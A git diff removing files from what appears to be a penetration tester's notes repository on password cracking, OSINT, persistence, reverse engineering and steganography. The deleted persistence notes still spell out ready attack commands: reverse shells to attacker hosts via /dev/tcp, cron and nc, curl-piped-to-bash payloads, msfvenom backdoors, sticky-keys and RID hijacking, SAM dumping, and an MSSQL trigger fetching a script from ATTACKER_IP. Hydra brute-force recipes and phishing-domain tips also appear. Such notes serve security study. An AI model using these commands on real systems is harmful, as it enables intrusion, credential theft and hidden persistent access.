- for a in range(len(jerar)): - print("[+] "+str(algorithms[jerar[a]])) - - first = None - except KeyboardInterrupt: - print("\n\n\tBye!") - exit() \ No newline at end of file diff --git a/hashes/hash_cracker.py b/hashes/hash_cracker.py deleted file mode 100755 index ee89b3a..0000000 --- a/hashes/hash_cracker.py +++ /dev/null @@ -1,20 +0,0 @@ -#!/usr/bin/env python - -import hashlib -import pyfiglet - -print(pyfiglet.figlet_format("md5 cracker")) - -wordlist_location = str(input("Wordlist file location: ")) -hash_input = str(input("Enter hash to be cracked: ")) - -with open(wordlist_location, 'rb') as _f: - for line in _f.readlines(): - line = line.strip() - hash_ob = hashlib.sha256(line) - #hash_ob = hashlib.md5(line) - hashed_pass = hash_ob.hexdigest() - print(line) - if hashed_pass == hash_input: - print("Password found: " + line.decode()) - exit(0) diff --git a/hashes/hashcat_utils.md b/hashes/hashcat_utils.md deleted file mode 100644 index 948a63c..0000000 --- a/hashes/hashcat_utils.md +++ /dev/null @@ -1,24 +0,0 @@ -# Hashcat Utilities - -* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes) - -## Wordlists - -* Combine wordlists -```sh -combinator wordlist.txt otherwordlist.txt > newwordlist.txt -``` - -* Create wordlist -```sh -hashcat --force -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt -``` - -## Using Masks - -* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset -* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack) -* Bruteforcing seven lowerspace characters using `SHA2-384` as an example -```sh -hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l -``` diff --git a/hashes/namely b/hashes/namely deleted file mode 160000 index 8736d08..0000000 --- a/hashes/namely +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 8736d08a096695069b1d5cfa7ac20e5a874980db diff --git a/hashes/password_cracking/colabcat b/hashes/password_cracking/colabcat deleted file mode 160000 index 3e6dcae..0000000 --- a/hashes/password_cracking/colabcat +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 3e6dcae3fb2b917d16d2cf527c6f4538200fc081 diff --git a/hashes/password_cracking/hydra.md b/hashes/password_cracking/hydra.md deleted file mode 100644 index 1902f78..0000000 --- a/hashes/password_cracking/hydra.md +++ /dev/null @@ -1,37 +0,0 @@ -# Hydra usage - -## Examples - -* HTTP post form -```sh -hydra -l -P MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -``` -* HTTP basic auth -```sh -hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected -``` - - -|Command|Description| -|-------|-----------| -|`hydra -P -v `|Brute force against a protocol of your choice| -|`hydra -v -V -u -L -P -t 1 -u `|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)| -|`hydra -t 1 -V -f -l -P rdp://`|Attack a Windows Remote Desktop with a password list.| -|`hydra -l -P . $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.| - -## Parameter - -|Option|Decription| -|------|----------| -|-l|Single username| -|-P|Indicates use the following wordlist| -|http-post-form|indicates the method| -|/login url|the login URL| -|:username|the form field where the username is entered| -|^USER^|tells Hydra to use the username from -l| -|password|the formfield where the password is entered| -|^PASS^|tells Hydra to use the wordlist from -P| -|Login|indicates to Hydra the login failed message| -|Login failed|is the login failure message that the form returns| -|F=incorrect|If this word appears on the page, login failed| -|-V| verbose| diff --git a/hashes/password_cracking/john.md b/hashes/password_cracking/john.md deleted file mode 100644 index 3a51428..0000000 --- a/hashes/password_cracking/john.md +++ /dev/null @@ -1,43 +0,0 @@ -# John The Ripper - -* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats) - -# Usage - -* Example -```sh -john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2 -``` - -## Declaring Structure -* List subformat -```sh -john --list=subformats -``` -```sh -john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2 -``` - -## Rules -* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml) -* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf` -* Create config for mutations, e.g. border mutation -```sh -[List.Rules:border] -$[0-9]$[0-9] -``` -* Run john with parameter `--rules=border` - -### Existing Rules -* `l33t`, l33tsp34k -* `NT`, case mutation -* Example for `best64` -```sh -john --wordlist=single_password.txt --rules=best64 --stdout > out.txt -``` - -### Subformats -* Some salted passwords need dynamic rules -```sh -john --list=subformats -``` diff --git a/hashes/password_cracking/smb_challenge.md b/hashes/password_cracking/smb_challenge.md deleted file mode 100644 index 9204451..0000000 --- a/hashes/password_cracking/smb_challenge.md +++ /dev/null @@ -1,19 +0,0 @@ -# SMB Response Request - -* Network traffic of the SMB handshake is needed -* Fields are - * username - * domain - * server challenge - * ntproofstring - * NTLMv2Response with ommited hex of type like 'ntlmProofStr' at the start - -## Usage - -* Format the fields -```sh -username::domain:serverChallenge:ntproofstring:NTLMv2Response -``` - -* Use john to decrypt - diff --git a/hashes/password_cracking/sucrack.md b/hashes/password_cracking/sucrack.md deleted file mode 100644 index 132fba8..0000000 --- a/hashes/password_cracking/sucrack.md +++ /dev/null @@ -1,8 +0,0 @@ -# sucrack - -* [Repo](https://github.com/hemp3l/sucrack.git) -* Upload to target and build -```sh -sucrack -u -w 100 -``` - diff --git a/hashes/password_cracking/vnc.md b/hashes/password_cracking/vnc.md deleted file mode 100644 index 9903c26..0000000 --- a/hashes/password_cracking/vnc.md +++ /dev/null @@ -1,6 +0,0 @@ -# VNC Password Decoding - -* Found passwords in vnc config files may be decoded via -```sh - echo -n "" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv -``` diff --git a/hashes/password_guessing/standard_passwords.md b/hashes/password_guessing/standard_passwords.md deleted file mode 100644 index 92a116b..0000000 --- a/hashes/password_guessing/standard_passwords.md +++ /dev/null @@ -1,9 +0,0 @@ -# Initial Passwords - -* Services and products sometimes have credentials set initially. - -* [default-password](https://default-password.info) -* [datarecovery](https://datarecovery.com/rd/default-passwords/) - - - diff --git a/hashes/wordlistctl b/hashes/wordlistctl deleted file mode 160000 index 62b4721..0000000 --- a/hashes/wordlistctl +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 62b472187bfd789badcfbfd73fe75934bab1a969 diff --git a/osint/LeetLinked b/osint/LeetLinked deleted file mode 160000 index 9032c97..0000000 --- a/osint/LeetLinked +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 9032c973e413199990b77e73a7d3896e3f5ba77f diff --git a/osint/osint_links.txt b/osint/osint_links.txt deleted file mode 100644 index 5a62e65..0000000 --- a/osint/osint_links.txt +++ /dev/null @@ -1,9 +0,0 @@ -https://urlscan.io/ -https://abuse.ch -https://bazaar.abuse.ch/ -https://feodotracker.abuse.ch/ -https://sslbl.abuse.ch/ -https://urlhaus.abuse.ch/ -https://threatfox.abuse.ch/ -https://www.phishtool.com/ -https://talosintelligence.com/ diff --git a/osint/recon_ng.md b/osint/recon_ng.md deleted file mode 100644 index 63dd6e9..0000000 --- a/osint/recon_ng.md +++ /dev/null @@ -1,4 +0,0 @@ -# recon-ng - -[Homepage](https://github.com/lanmaster53/recon-ng) -[Repo](https://salsa.debian.org/pkg-security-team/recon-ng) diff --git a/osint/social_engineering/gophish.md b/osint/social_engineering/gophish.md deleted file mode 100644 index 9bc9ef0..0000000 --- a/osint/social_engineering/gophish.md +++ /dev/null @@ -1,12 +0,0 @@ -# Gophish - -* [Repo](https://github.com/gophish/gophish.git) - -## Usage - -* Create - * Send profile - * Landing page - * Email templates - * User groups - * New Campaign diff --git a/osint/social_engineering/phishing_domain.md b/osint/social_engineering/phishing_domain.md deleted file mode 100644 index 5ddf071..0000000 --- a/osint/social_engineering/phishing_domain.md +++ /dev/null @@ -1,5 +0,0 @@ -# Phishing Domains - -* Use an old, unused domain. -* Typosquatting, register a similar domain. -* Use similar looking chars from unicode. diff --git a/osint/spiderfoot.md b/osint/spiderfoot.md deleted file mode 100644 index c94964d..0000000 --- a/osint/spiderfoot.md +++ /dev/null @@ -1,8 +0,0 @@ -# Spiderfoot - -* OSINT online spider -* [Repo & releases](https://github.com/smicallef/spiderfoot.git) -* Start server locally via -```sh -python sf.py -l 127.0.0.1:5000 -``` diff --git a/osint/theharvester.md b/osint/theharvester.md deleted file mode 100644 index f00c05c..0000000 --- a/osint/theharvester.md +++ /dev/null @@ -1,4 +0,0 @@ -# theharvester - -[Homepage](https://github.com/laramies/theHarvester) -[Repo](https://gitlab.com/kalilinux/packages/theharvester.git) diff --git a/persistence/bashrc.md b/persistence/bashrc.md deleted file mode 100644 index bcd46a5..0000000 --- a/persistence/bashrc.md +++ /dev/null @@ -1,8 +0,0 @@ -# Bashrc Bogus - -## Add Reverse Shell -```sh -echo 'bash -c "bash -i >& /dev/tcp// 0>&1"' >> ~/.bashrc -``` - - diff --git a/persistence/crontab.md b/persistence/crontab.md deleted file mode 100644 index 50df63c..0000000 --- a/persistence/crontab.md +++ /dev/null @@ -1,15 +0,0 @@ -# Cronjobs - -* `crontab -l` -* `cat /etc/crontab` - -## Add Cronjob -* Add line -```sh -* * * * * root curl http://:8000/shell.sh | bash -``` - * Shell content - ```sh - bash -c "bash -i >& /dev/tcp// 0&1" - ``` - diff --git a/persistence/meterpreter.md b/persistence/meterpreter.md deleted file mode 100644 index e13b02c..0000000 --- a/persistence/meterpreter.md +++ /dev/null @@ -1,6 +0,0 @@ -# Meterpreter Persistence - -## Load shell on system startup -```sh -run persistence -X -``` diff --git a/persistence/persistence.md b/persistence/persistence.md deleted file mode 100644 index 065d02a..0000000 --- a/persistence/persistence.md +++ /dev/null @@ -1,323 +0,0 @@ -# Persistence - -* Gain through - * Startup folder persistence - * Editing registry keys - * Scheduled tasks - * SUID - * BITS - * Creating a backdoored service - * Creat user - * RDP - -## Gain Persistence on Windows -* Browser. Add to trusted sites. -* Powershell -```sh -Invoke-WebRequest http://:/shell.exe -OutFile .\shell2.exe -``` -* DOSprompt -```cmd -certutil -urlcache -split -f http://:\AppData\Roaming\backdoor.exe" -``` -### Background Intelligence Transfer Service (BITS) -```sh -bitsadmin /create __shell__ -bitsadmin /addfile __shell__ "http://:/shell2.exe" "C:\Users\\Documents\shell2.exe" -``` -```sh -bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c shell2.exe /complete __shell__ | start /B C:\Users\\Documents\shell2.exe" -bitsadmin /SetMinRetryDelay 30 -bitsadmin /resume -``` - -## Elevate Privileges -* Create user `net user /add ` -* Add to admin group via `net localgroup administrators /add` -* Check `net localgroup Administrator` - -### More stealthy - -* Backup Operator group is more stealthy, no admin by r/w on files -```sh -net localgroup "Backup Operators" /add -net localgroup "Remote Management Users" /add -``` -* The following two groups are assigned through membership of `Backup Operators` - * SeBackupPrivilege, read files - * SeRestorePrivilege, write files - -* Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via -```sh -reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 -``` -* Afterwards, check if `Backup Operators` is enabled via `whoami /groups` -* Backup `SAM` and `SYSTEM` via -```sh -reg save hklm\system system.bak -reg save hklm\sam sam.bak -download system.bak -download sam.bak -secretsdump.py -sam sam.bak -system system.bak LOCAL -``` -* Pass-the-hash via evil-winrm - -### secedit - -* Get r/w on files through editing a config file -* Export secedit and open it -```sh -secedit /export /cfg config.inf -``` -* Add user to the groups -```sh -SeBackupPrivilege = [...], -SeRestorePrivilege = [...], -``` -* Convert the file -```sh -secedit /import /cfg config.inf /db config.sdb -secedit /configure /db config.sdb /cfg config.infk -``` -* Add the user to the RDP group via net localgroup like before or do -```sh -Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI -``` -* Add & Click user -> Full Control(All Operations) -* Set `LocalAccountTokenFilterPolicy` to `1` like in the section before - -### Relative ID (RID) - -* UID like in linux - * Administrator has `RID = 500` - * Other interactive users `RID >= 1000` -* Get RIDs -```sh - wmic useraccount get name,sid -``` -* Assign `500` to regular user -```sh - PsExec64.exe -i -s regedit -``` -* Open `HKLM\SAM\SAM\Domains\Account\Users\<0xRID>` -* Search for RID value as hexadecimal value -* Open the key called `F` and change effective RID at position `0x30` -* Insert LE hex of `0d500`, which is `f401` - -## Add to registry - -* Execute on user logon via -```sh -reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f -``` - -## Add a Service - -### Meterpreter - -* Inside meterpreter `load powershell` and `powershell_shell` -```sh -New-Service -Name "" -BinaryPathName "" -Description "" -StartupType "Boot" -``` - -### Powershell - -* Start a service automatically -```sh -sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto -sc.exe start SteamUpdater -``` - -* Use a service PE instead -```sh -msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe -``` - -* Modify an existing service - * Enumerate all the services -```sh -sc.exe query state=all -``` - * Info about a specific service, start type should be automatic, service start name should be target user -```sh -sc.exe qc -``` - * Reconfigure -```sh -sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem" -sc.exe start FoundService -``` - -## Add Scheduled Task - -```sh -$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe -$B = New-ScheduledTaskTrigger -AtLogOn -$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest -$D = New-ScheduledTaskSettingsSet -$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D -Register-ScheduledTask ReverseShell -InputObject $E -``` - -* Alternatively via `schtasks` -```sh -schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM -``` - * Check task -```sh -schtasks /query /tn SteamUpdater -``` - -* Deleting Security Descriptor of a task to make it invisible. Delete the following key -```sh -HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\\SD -``` - -## File Backdoor - -### Mimic PE -```sh -msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe -``` - -### Reference Script -* Recycle shortcut of an app to reference a reverse shell script - * Right click -> `Properties` -> `Target` -* Reference the the script `certainlynobackdoor.ps1` via -```sh -powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1 -``` -* Content of the script `certainlynobackdoor.ps1` -```sh -Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT" -C:\Windows\System32\calc.exe -``` - -### File Association - -* Change associated `ProgID` of a file type inside registry `HKLM\Software\Classes\` -* Choose a class and `/shell/open/command` contains the file to be opened as the first argument `%1` -* Chang the argument to a shell script and pass the arg through it -```sh -Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT" -C:\Windows\system32\NOTEPAD.EXE $args[0] -``` -* Change `command\default` to `powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1` - - -## Persistence via Logon - -### Startup directories -* Users' Startup directory under -```sh -C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup -``` - -* Startup directory for all users, put the reverse shell here -```sh -C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp -``` - -### Registry Keys - -* `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` -* `HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce` -* `HKLM\Software\Microsoft\Windows\CurrentVersion\Run` -* `HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce` - -* Create `Expandable String Value` under any of this keys with the value of the reverse shell path - - -* `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\` loads user profile after authentication is done - * Either `shell` or `Userinit` can be appended with a comma separated command - -### Logon Scripts - -* `userinit.exe` checks var `UserInitMprLogonScript` which cann be used to load logon scripts - -* Create variable `UserInitMprLogonScript` under `HKCU\Environment` which gets the reverse shell as a payload - - -## RDP or Login Screen - -### Sticky Keys -* Press shift x 5 and `C:\Windows\System32\sethc.exe` will be executed -* Take ownership of the binary via -```sh -takeown /f c:\Windows\System32\sethc.exe -icacls C:\Windows\System32\sethc.exe /grant Administrator:F -``` -* Overwrite with `cmd.exe` -```sh -copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe -``` - -### Utilman - -* Ease of access button is clickable at the login screen, it is executed with system privileges -* Take ownership and overwrite with `cmd.exe` -```sh -takeown /f c:\Windows\System32\utilman.exe -icacls C:\Windows\System32\utilman.exe /grant Administrator:F -copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe -``` - -## Web Shell - -* Default user is `iis apppool\defaultapppool` -* Has `SeImpersonatePrivilege` - -* [Download Web Shell](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx) -* Move shell to `C:\inetpub\wwwroot` on target -* Get the shell via `http://$TARGET_IP/shell.aspx` - -## MSSQL - -* Triggers bind actions such as INSERTs - -* Open Microsoft SQL Server Management Studio - * Choose windows auth - * `New Query` - * Enable Advance Options via -```sh -sp_configure 'Show Advanced Options',1; -RECONFIGURE; -GO - -sp_configure 'xp_cmdshell',1; -RECONFIGURE; -GO -``` - * Grant privileges to all users -```sh -USE master -GRANT IMPERSONATE ON LOGIN::sa to [Public]; -``` - - * Change to DB -```sh -USE -``` - - * Create trigger -```sh -CREATE TRIGGER [sql_backdoor] -ON HRDB.dbo.Employees -FOR INSERT AS - -EXECUTE AS LOGIN = 'sa' -EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"'; -``` - -* Trigger the trigger by visiting the site which triggers the trigger through a db call - diff --git a/persistence/wmi.md b/persistence/wmi.md deleted file mode 100644 index 6d09ef1..0000000 --- a/persistence/wmi.md +++ /dev/null @@ -1,3 +0,0 @@ -# WMI Backdoor - -* [BlackHat 2015, Backdoor](https://github.com/mattifestation/WMI_Backdoor.git) diff --git a/reverse engineering/SCDBG b/reverse engineering/SCDBG deleted file mode 160000 index 95dcf1d..0000000 --- a/reverse engineering/SCDBG +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 95dcf1d6a6072c6110dd99311b49d7734d17ce5e diff --git a/reverse engineering/android/misc.md b/reverse engineering/android/misc.md deleted file mode 100644 index 1fbc8ff..0000000 --- a/reverse engineering/android/misc.md +++ /dev/null @@ -1,81 +0,0 @@ -# Misc - -* `Dalvik` is the JVM of Android - -## SMALI - -* `SMALI` is the byte code derived from Java. -* Types -``` -V void -Z boolean -B byte -S short -C char -F float -I int -J long -D double -[ array -``` - -### Registers -* Registers are 32 bits -* Type long and double use two registers 32+32=64 bits -* `.registers`, total number of regs in method -* `.locals`, non parameter regs in method -* Arguments of a method are put into registers from highest to lowest. -* The object itself is a parameter to its method. - -* Register naming schemes are -* Normal local register are name v0, v1, v2 ... -* Parameter register are a second naming on top, e.g.v2 and p0 or v3 and p1 are the same registers. - - -## APK Structure - -* `AndroidManifest.xml`, binary XML -* `classes.dex`, app code compilation as dex -* `resource.arsc`, precompiled resources in XML -* `res`, resource dir -* `assets` app assets -* `lib`, libraries -* `META/INF`, contains metadata file `MANIFEST.MF` and signature of the apk. - -## Tools - -* `jadx -d ` as a decompiler -* dex2jar to convert apk to jar -```sh -d2j-dex2jar.sh /path/application.apk -``` -* Dex to smali with `d2j-dex2smali` -* jd-gui as decompiler -* `apktool` smali source from apk - -* [Firebase scanner](https://github.com/shivsahni/FireBaseScanner.git) -* [Mara reversing framework](https://github.com/xtiankisutsa/MARA_Framework.git) -* [Mobile Security Framework](https://github.com/MobSF/Mobile-Security-Framework-MobSF.git) -* Proguard deobfuscates code -* [PID Cat log reader](https://github.com/JakeWharton/pidcat.git) -* Burpsuite listener on Android emulator -* [Drozer](https://github.com/FSecureLABS/drozer) -```sh -adb forward tcp:31415 tcp:31415 -drozer console connect -run app.package.list -> see all the packages installed -run app.package.info -a -> view package information. -run app.package.attacksurface package_name -run app.activity.info -f package_name -run app.activity.start --component package name component_name -``` -```sh -run app.provider.info -a package_name -run scanner.provider.finduris -a package_name -run app.provider.query uri -run app.provider.update uri --selection conditions selection_arg column data -run scanner.provider.sqltables -a package_name -run scanner.provider.injection -a package_name -run scanner.provider.traversal -a package_name -``` - diff --git a/reverse engineering/docs/deobfuscation.md b/reverse engineering/docs/deobfuscation.md deleted file mode 100644 index e5ee271..0000000 --- a/reverse engineering/docs/deobfuscation.md +++ /dev/null @@ -1,97 +0,0 @@ -# Deobfuscation - -## Principles of Obfuscation - -* Software obfuscation may be divided into a theoretical layered approach, done by [Hui Xu et. al](https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-020-00049-3.pdf) - -* These layers and what's obfuscated are: - * __Code Element__ - * Layout - * Controls - * Data - * Classes - * Methods - * __Software Component__ - * __Inter Component__ - * Library calls - * Used Resources - * __Application__ - * DRM System - * Neural Networks - -## Evade Statical Rules - -* Critical data is obfuscated by the __Code Element__ layer which contains the following methods of obfuscation - * __Array Transformation__ - * __Data Encoding__ - * __Data Procedurization__ - * __Data Splitting & Merging__ - -### Splitting & Merging of Strings - -* Breaking signature by modifying data distribution inside the code -* This may be done by modifying strings and functions through following measures - -* __Joining__ -```python -"CAFFEE" + "BABE" -``` - -* __Reordering__ -```python -a = "BABE" -b = "CAFFEE" -f"{b}{a}" -``` - -* __Whitespaces of functions which are not interpreted__ -```c -int main ( void ) { - printf ( "The answer is %d", 42 ) ; -} -``` - -* __Adding ticks which are not interpreted__ - -* __Change `uPpER aNd loWeRcAsE oF cHaRaCtErS iN tHe StRinG`__ - -### Adding Unnecessary Instructions - -* Obfuscation of layout and controls inside the code -* __Junk Stubs__ -* __Separation of Related Code__ -* __Stripping Redundant Symbols__ -* __Meaningless Identifiers__ -* __Converting Explicit to Implicit Instructions__ -* __Dispatcher Based Controls Executed During Runtime__ -* __Probabilistic Control Flows__ -* __Bogus Control Flows__ - - -### Control Flow - -* Changing or adding to the flow of the code through change of conditions -* Changes may be set to arbitrary code segments by __Opaque Predicates__ -* An __Opaque Predicate__ is a control path and value known by the obfuscater and hard to find out by the reverse engineer - -### Protecting Data - -* Stripping and protecting - * __Code Structure__ - * __Object names__ - * __File & Compilation Properties__ - -* To strip symbols -```sh -strip --strip-all -``` - -* Check via -```sh -nm -``` - -## Usage - -* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator -* In case of dotnet: __Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well__ diff --git a/reverse engineering/docs/dll_reversing.md b/reverse engineering/docs/dll_reversing.md deleted file mode 100644 index 8899c40..0000000 --- a/reverse engineering/docs/dll_reversing.md +++ /dev/null @@ -1,9 +0,0 @@ -# DLL Reversing - -* Start DLL on its own with the help a wrapper -```C# -HMODULE dll = LoadLibraryA("DLL.DLL"); -typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y) -Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName"); -Add(1, 2); -``` diff --git a/reverse engineering/docs/firmware.md b/reverse engineering/docs/firmware.md deleted file mode 100644 index faaee1d..0000000 --- a/reverse engineering/docs/firmware.md +++ /dev/null @@ -1,35 +0,0 @@ -# Reversing Firmware - -## Tools -* binwalk -* unlzma -* tar -* [fat](https://github.com/attify/firmware-analysis-toolkit.git) - * Create usable environment and start firmware inside it - ```sh - ./fat.py - ``` -* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git` - -## Usage -* Check image via `strings` -* Check CRC via `cksum -a crc ` -* Use `binwalk` to extract. There are to methods - * `-e` extract by offset - * `--dd=".*"` by file extension - -### Mount JFFS2 File -* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10` -```sh -rm -rf /dev/mtdblock0 -mknod /dev/mtdblock0 b 31 0 -mkdir /mnt/jffs2 -modprobe jffs2 -modprobe mtdram -modprobe mtdblock -dd if= of=/dev/mtdblock0 -mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/ -``` - -## Tips & Tricks -* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php) diff --git a/reverse engineering/docs/function_mangling.md b/reverse engineering/docs/function_mangling.md deleted file mode 100644 index d44db63..0000000 --- a/reverse engineering/docs/function_mangling.md +++ /dev/null @@ -1,4 +0,0 @@ -# Function Decoration - -* Done to imported functions in order to do interpositioning and identify the variants of the function. -* [name mangling](https://en.wikipedia.org/wiki/Name_mangling) diff --git a/reverse engineering/docs/scada.md b/reverse engineering/docs/scada.md deleted file mode 100644 index b36c598..0000000 --- a/reverse engineering/docs/scada.md +++ /dev/null @@ -1,35 +0,0 @@ -# Supervisory Control and Data Acquisition (SCADA) - -* SCADA works as an aggregatio of the following systems - * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices. - * __Remote Terminal Unit (RTU)__, use for wide area telemetry - * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input. - * __Communication network__ - -* Security is no first class citizen - -## Modbus - -* Developed by Modicon -* Master/Slave, latter has an 8 bit address. -* RS-485 Connector -* Data registers 16 bit - * Input register, 16 bit ro - * Hold register, rw - * Coil register, 1 bit rw - * Discrete register, 1bit ro - -### Function Codes -* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html) -* RTU request inside of TCP segments, port 502 - -* 1 __Read Coil__ -* 2 __Read Discrete Input__ -* 3 __Read Holding Registers__ -* 4 __Read Input Registers__ -* 5 __Write Single Coil__ -* 6 __Write Single Holding Register__ -* 15 __Write Multiple Coils__ -* 16 __Write Multiple Holding Registers__ - - diff --git a/reverse engineering/java/krakatau.md b/reverse engineering/java/krakatau.md deleted file mode 100644 index c998327..0000000 --- a/reverse engineering/java/krakatau.md +++ /dev/null @@ -1,17 +0,0 @@ -# Krakatau - -## Usage -* Get bytecode from `jar` file -```sh -krakatau-disassemble -r file.jar -out dissassemble.zip -``` -* Generate bytecode -```sh -krakatau-assemble -out result.jar -r dissassembled/ -``` -* Do changes to the bytecode -* Compile jar file -```sh -java -cp result.jar -``` - diff --git a/reverse engineering/windows/portable-executable.md b/reverse engineering/windows/portable-executable.md deleted file mode 100644 index 7f3d3a7..0000000 --- a/reverse engineering/windows/portable-executable.md +++ /dev/null @@ -1,33 +0,0 @@ -# Portable Executable - -* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format) -* An executable binary in the windows world -The file format consists of - * PE Header - * Data Sections - -## Data Section - -The data section consists of -* __.text__, program code -* __.data__, initialized variables -* __.bss__, unanitialized variables -* __.edata__, exportable objects and related table info -* __.idata__, imported objects and related table info -* __.reloc__, image relocation info -* __.rsrc__, links external resources, e.g. icons, images, manifests - -## Starting a PE - -If a process starts, the PE is read in the following order -1. Header sections - * File signatue is __MZ__, and magic number are read - * Architecture of the platform - * timestamp -2. Section table details is parsed -3. Content is mapped into memory based on - * Entry point address and offset of ImageBase - * Relative Virtual Address (RVA), addresses related to Imagebase -4. Libraries and imports are loaded -5. Entrypoint address of the main function is run - diff --git a/stego/docs/outguess.md b/stego/docs/outguess.md deleted file mode 100644 index c056ec3..0000000 --- a/stego/docs/outguess.md +++ /dev/null @@ -1,2 +0,0 @@ -# Outguess -`man outguess` diff --git a/stego/docs/remnux.md b/stego/docs/remnux.md deleted file mode 100644 index 454db33..0000000 --- a/stego/docs/remnux.md +++ /dev/null @@ -1,24 +0,0 @@ -# ReMnux -* [Documentation](https://docs.remnux.org/) - -## Tools - -### Peepdf -* Extracting JS from PDF using config file into `js_from_pdf.js` -```sh -echo 'extract js > js_from_pdf.js' > extract_js.conf -peepdf -s extract_js.conf -``` - -### vmonkey -* Detects malicious VBasic code in documents. -```sh -vmonkey -``` - -### Packaged Binaries -* Can be identified via entropy or loaded libs - * The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`. - * [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers. - * File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high. - diff --git a/stego/docs/stegbrute.md b/stego/docs/stegbrute.md deleted file mode 100644 index 08c119e..0000000 --- a/stego/docs/stegbrute.md +++ /dev/null @@ -1,9 +0,0 @@ -# Stegbrute -Bruteforce stego jpegs with a password. - -* install via `cargo install stegbrute` - -## Usage -```sh -stegbrute -f -w -``` diff --git a/stego/docs/steghide.md b/stego/docs/steghide.md deleted file mode 100644 index 91ba361..0000000 --- a/stego/docs/steghide.md +++ /dev/null @@ -1,8 +0,0 @@ -# Steghide - -* JPGs only - -* Example -```sh -steghide extract -sf jpeg1.jpeg -``` diff --git a/stego/docs/stegoveritas.md b/stego/docs/stegoveritas.md deleted file mode 100644 index eb09a3f..0000000 --- a/stego/docs/stegoveritas.md +++ /dev/null @@ -1,3 +0,0 @@ -# Stegoveritas - -* Install via `pip install stegoveritas` and `stegoveritas_install_deps` diff --git a/stego/docs/zsteg.md b/stego/docs/zsteg.md deleted file mode 100644 index 7a071b9..0000000 --- 